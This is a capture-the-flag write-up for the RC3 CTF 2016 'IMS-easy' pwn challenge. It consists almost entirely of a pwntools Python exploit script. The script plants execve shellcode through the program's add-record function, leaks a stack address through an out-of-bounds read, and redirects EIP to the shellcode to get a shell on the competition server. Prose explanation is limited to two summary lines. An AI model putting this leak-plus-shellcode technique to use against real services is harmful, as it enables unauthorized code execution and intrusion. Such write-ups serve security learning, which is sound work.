[RC3 CTF_2016] IMS-easy(pwn)

## RC3 CTF_2016(IMS-easy,pwn,150pts)

[Summary]

1. OOB memory leak(stack) vuln

2. Shellcode Execute & EIP control

[Exploit Code]

from pwn import *
import base64
 
context(arch = 'i386',os='linux')
local=False
 
if local:
    p = process("./IMS-easy")
    libc = ELF("/lib/x86_64-linux-gnu/libc-2.19.so")
else:
    p = remote("ims.ctf.rc3.club",7777)
 
binary = ELF("./IMS-easy")
 
raw_input()
 
def send_add(id_param, code_param):
    print p.recvuntil('Choose: ')
    p.send('1\n')
    print p.recvuntil('ID: ')
    p.send(id_param+'\n')
    print p.recvuntil('code: ')
    p.send(code_param+'\n')
 
send_add('2425393296','\x90\x90\x90\x90\x90\x90\x90\x90')
#send_add('1768042344','\x31\xc0\x50\x68'+'\x2f\x2f\x73\x68')
#send_add('2424360203','\x6e\x89\xe3\x50'+'\x53\x89\xe1\xb0')
send_add('1751675695','\x6a\x0b\x58\x31'+'\xf6\x56\x68\x2f')
send_add('2160970377','\x2f\x62\x69\x6e'+'\x89\xe3\x31\xc9')
 
for i in xrange(0,3):
    send_add('2425393296','\x90\x90\x90\x90\x90\x90\x90\x90')
 
 
print p.recvuntil('Choose: ')
p.send('3\n')
print p.recvuntil('view: ')
p.send('7\n')
stack_leak = p.recvline()
print stack_leak
stack_leak = stack_leak[12:stack_leak.find(',')]
stack_addr = hex(4294967295+int(stack_leak)+1)
print 'stack_addr : ' + stack_addr
print 'stack_addr(dec) : ' + str(int(stack_addr,16))
 
print p.recvuntil('Choose: ')
p.send('1\n')
print p.recvuntil('ID: ')
p.send(str(int(stack_addr,16)-220)+'\n')    # EIP control to shellcode!
print p.recvuntil('code: ')
p.send('AAAAAAAA\n')
 
print p.recvuntil('Choose: ')
p.send('4\n')
 
p.interactive()
'''
print '[*] Sending Payload...'
payload = base64.b64encode('0000\x78\x92\x04\x08\x40\xeb\x11\x08') + '\n'
p.send(payload)
print p.recv(1024)
 
print "[*] Exploit Success~~!!!\n\n"
p.interactive()
'''